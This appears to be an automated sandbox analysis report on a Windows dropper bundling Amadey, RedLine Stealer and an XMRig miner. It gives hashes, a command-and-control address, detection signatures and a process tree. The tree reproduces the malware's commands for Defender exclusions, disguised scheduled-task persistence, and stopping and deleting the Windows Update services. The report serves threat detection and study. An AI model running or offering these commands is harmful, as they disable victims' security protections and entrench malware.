amadey | 3497d8ba5b2789d2fc24ca735c9f328e7bb1e6c0a3b76d6c45d9667ab91b74d5

Analysis

max time kernel
152s
max time network
157s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
06/05/2023, 22:28

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe
Size

4.3MB
MD5

6f90a7c04412c859da5f98dc5d77955f
SHA1

570eb3f2a5ef5a2e8660dedd7c7ad7afbc10c11b
SHA256

541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a
SHA512

45e2b9c416e84724baf731b3b9c4755e0ce9be4df8d6a6b021b76e8901d563c7983509236b79470b3e40a4ae90fbde5c9dd4c43ebe55c14b8478c49c32d20b22
SSDEEP

98304:ZkkCZklBzstya5dACREJQ+Y261vb8MQJSP1y5:SkCoBzsEDC526Jbfy

Score

10^/10

amadey redline xmrig evasion infostealer miner stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

3.70

77.73.134.27/n9kdjc3xSf/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detects Redline Stealer samples 3 IoCs

This rule detects the presence of Redline Stealer samples based on their unique strings.

stealer

resource	yara_rule
behavioral1/memory/1544-91-0x000000001AFC0000-0x000000001B2A2000-memory.dmp	redline_stealer
behavioral1/memory/1544-94-0x00000000023C0000-0x0000000002440000-memory.dmp	redline_stealer
behavioral1/memory/1100-121-0x0000000019B60000-0x0000000019E42000-memory.dmp	redline_stealer

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 1704 created 1284	1704	XandETC.exe	14
PID 1704 created 1284	1704	XandETC.exe	14
PID 1704 created 1284	1704	XandETC.exe	14
PID 1704 created 1284	1704	XandETC.exe	14
PID 1704 created 1284	1704	XandETC.exe	14
PID 1752 created 1284	1752	updater.exe	14
PID 1752 created 1284	1752	updater.exe	14
PID 1752 created 1284	1752	updater.exe	14
PID 1752 created 1284	1752	updater.exe	14
PID 1752 created 1284	1752	updater.exe	14
PID 1752 created 1284	1752	updater.exe	14
PID 1104 created 1284	1104	conhost.exe	14
PID 1752 created 1284	1752	updater.exe	14

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 5 IoCs

miner

resource	yara_rule
behavioral1/memory/936-138-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/936-140-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/936-141-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/936-145-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/936-147-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 8 IoCs

pid	Process
1000	ss31.exe
268	oldplayer.exe
1704	XandETC.exe
1012	oneetx.exe
1684	oneetx.exe
1752	updater.exe
1696	oneetx.exe
1864	oneetx.exe

Loads dropped DLL 5 IoCs

pid	Process
840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe
840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe
840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe
268	oldplayer.exe
1984	taskeng.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/936-135-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/936-138-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/936-140-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/936-141-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/936-145-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/936-147-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1752 set thread context of 1104	1752	updater.exe	89
PID 1752 set thread context of 936	1752	updater.exe	96

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1196	sc.exe
768	sc.exe
880	sc.exe
1604	sc.exe
1708	sc.exe
1144	sc.exe
1372	sc.exe
1052	sc.exe
1656	sc.exe
1448	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1936	schtasks.exe
1412	schtasks.exe
1068	schtasks.exe

Modifies data under HKEY_USERS 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 002536b18d80d901	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	conhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1704	XandETC.exe
1704	XandETC.exe
1544	powershell.exe
1704	XandETC.exe
1704	XandETC.exe
1704	XandETC.exe
1704	XandETC.exe
1704	XandETC.exe
1704	XandETC.exe
1704	XandETC.exe
1704	XandETC.exe
1800	powershell.exe
1752	updater.exe
1752	updater.exe
1100	powershell.exe
1752	updater.exe
1752	updater.exe
1752	updater.exe
1752	updater.exe
1752	updater.exe
1752	updater.exe
744	powershell.exe
1752	updater.exe
1752	updater.exe
1752	updater.exe
1752	updater.exe
1104	conhost.exe
1104	conhost.exe
1752	updater.exe
1752	updater.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	Process not Found

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeShutdownPrivilege	1368	powercfg.exe
Token: SeShutdownPrivilege	1432	powercfg.exe
Token: SeShutdownPrivilege	1640	powercfg.exe
Token: SeShutdownPrivilege	1452	powercfg.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeShutdownPrivilege	672	powercfg.exe
Token: SeShutdownPrivilege	1728	powercfg.exe
Token: SeDebugPrivilege	744	powershell.exe
Token: SeShutdownPrivilege	848	powercfg.exe
Token: SeShutdownPrivilege	1788	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	960	WMIC.exe
Token: SeIncreaseQuotaPrivilege	960	WMIC.exe
Token: SeSecurityPrivilege	960	WMIC.exe
Token: SeTakeOwnershipPrivilege	960	WMIC.exe
Token: SeLoadDriverPrivilege	960	WMIC.exe
Token: SeSystemtimePrivilege	960	WMIC.exe
Token: SeBackupPrivilege	960	WMIC.exe
Token: SeRestorePrivilege	960	WMIC.exe
Token: SeShutdownPrivilege	960	WMIC.exe
Token: SeSystemEnvironmentPrivilege	960	WMIC.exe
Token: SeUndockPrivilege	960	WMIC.exe
Token: SeManageVolumePrivilege	960	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	960	WMIC.exe
Token: SeIncreaseQuotaPrivilege	960	WMIC.exe
Token: SeSecurityPrivilege	960	WMIC.exe
Token: SeTakeOwnershipPrivilege	960	WMIC.exe
Token: SeLoadDriverPrivilege	960	WMIC.exe
Token: SeSystemtimePrivilege	960	WMIC.exe
Token: SeBackupPrivilege	960	WMIC.exe
Token: SeRestorePrivilege	960	WMIC.exe
Token: SeShutdownPrivilege	960	WMIC.exe
Token: SeSystemEnvironmentPrivilege	960	WMIC.exe
Token: SeUndockPrivilege	960	WMIC.exe
Token: SeManageVolumePrivilege	960	WMIC.exe
Token: SeLockMemoryPrivilege	936	conhost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
268	oldplayer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 840 wrote to memory of 1000	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	27
PID 840 wrote to memory of 1000	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	27
PID 840 wrote to memory of 1000	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	27
PID 840 wrote to memory of 1000	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	27
PID 840 wrote to memory of 268	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	28
PID 840 wrote to memory of 268	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	28
PID 840 wrote to memory of 268	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	28
PID 840 wrote to memory of 268	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	28
PID 840 wrote to memory of 1704	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	29
PID 840 wrote to memory of 1704	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	29
PID 840 wrote to memory of 1704	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	29
PID 840 wrote to memory of 1704	840	541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe	29
PID 268 wrote to memory of 1012	268	oldplayer.exe	30
PID 268 wrote to memory of 1012	268	oldplayer.exe	30
PID 268 wrote to memory of 1012	268	oldplayer.exe	30
PID 268 wrote to memory of 1012	268	oldplayer.exe	30
PID 1012 wrote to memory of 1936	1012	oneetx.exe	31
PID 1012 wrote to memory of 1936	1012	oneetx.exe	31
PID 1012 wrote to memory of 1936	1012	oneetx.exe	31
PID 1012 wrote to memory of 1936	1012	oneetx.exe	31
PID 756 wrote to memory of 1684	756	taskeng.exe	35
PID 756 wrote to memory of 1684	756	taskeng.exe	35
PID 756 wrote to memory of 1684	756	taskeng.exe	35
PID 756 wrote to memory of 1684	756	taskeng.exe	35
PID 1528 wrote to memory of 1708	1528	cmd.exe	44
PID 1528 wrote to memory of 1708	1528	cmd.exe	44
PID 1528 wrote to memory of 1708	1528	cmd.exe	44
PID 1528 wrote to memory of 1448	1528	cmd.exe	46
PID 1528 wrote to memory of 1448	1528	cmd.exe	46
PID 1528 wrote to memory of 1448	1528	cmd.exe	46
PID 1528 wrote to memory of 1144	1528	cmd.exe	47
PID 1528 wrote to memory of 1144	1528	cmd.exe	47
PID 1528 wrote to memory of 1144	1528	cmd.exe	47
PID 1460 wrote to memory of 1368	1460	cmd.exe	48
PID 1460 wrote to memory of 1368	1460	cmd.exe	48
PID 1460 wrote to memory of 1368	1460	cmd.exe	48
PID 1528 wrote to memory of 1372	1528	cmd.exe	49
PID 1528 wrote to memory of 1372	1528	cmd.exe	49
PID 1528 wrote to memory of 1372	1528	cmd.exe	49
PID 1528 wrote to memory of 1196	1528	cmd.exe	50
PID 1528 wrote to memory of 1196	1528	cmd.exe	50
PID 1528 wrote to memory of 1196	1528	cmd.exe	50
PID 1528 wrote to memory of 1748	1528	cmd.exe	51
PID 1528 wrote to memory of 1748	1528	cmd.exe	51
PID 1528 wrote to memory of 1748	1528	cmd.exe	51
PID 1460 wrote to memory of 1432	1460	cmd.exe	52
PID 1460 wrote to memory of 1432	1460	cmd.exe	52
PID 1460 wrote to memory of 1432	1460	cmd.exe	52
PID 1528 wrote to memory of 292	1528	cmd.exe	53
PID 1528 wrote to memory of 292	1528	cmd.exe	53
PID 1528 wrote to memory of 292	1528	cmd.exe	53
PID 1460 wrote to memory of 1640	1460	cmd.exe	54
PID 1460 wrote to memory of 1640	1460	cmd.exe	54
PID 1460 wrote to memory of 1640	1460	cmd.exe	54
PID 1528 wrote to memory of 844	1528	cmd.exe	55
PID 1528 wrote to memory of 844	1528	cmd.exe	55
PID 1528 wrote to memory of 844	1528	cmd.exe	55
PID 1528 wrote to memory of 1140	1528	cmd.exe	56
PID 1528 wrote to memory of 1140	1528	cmd.exe	56
PID 1528 wrote to memory of 1140	1528	cmd.exe	56
PID 1528 wrote to memory of 528	1528	cmd.exe	57
PID 1528 wrote to memory of 528	1528	cmd.exe	57
PID 1528 wrote to memory of 528	1528	cmd.exe	57
PID 1460 wrote to memory of 1452	1460	cmd.exe	58

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1284
- C:\Users\Admin\AppData\Local\Temp\541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe
  "C:\Users\Admin\AppData\Local\Temp\541e2f4a8031bf40bf3e37f578ebbdfa62983a92737dfae5fc9c2bc333108a5a.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:840
- - C:\Users\Admin\AppData\Local\Temp\ss31.exe
    "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
    3⤵
    - Executes dropped EXE
    PID:1000
- - C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
    "C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:268
  - - C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
      "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1012
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1936
- - C:\Users\Admin\AppData\Local\Temp\XandETC.exe
    "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  PID:1252
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1412
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1368
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1432
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1640
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1452
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1528
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1708
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1448
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1144
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1372
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1196
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1748
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:292
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:844
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1140
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
    3⤵
    PID:1036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1100
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:1428
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:768
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:880
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1052
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1656
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1604
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1552
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1128
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:1544
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1528
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:744
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1068
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1236
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:672
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1728
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:848
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe zuhwtyqtfkk
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:1104
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:960
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1036
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:936

C:\Windows\system32\taskeng.exe
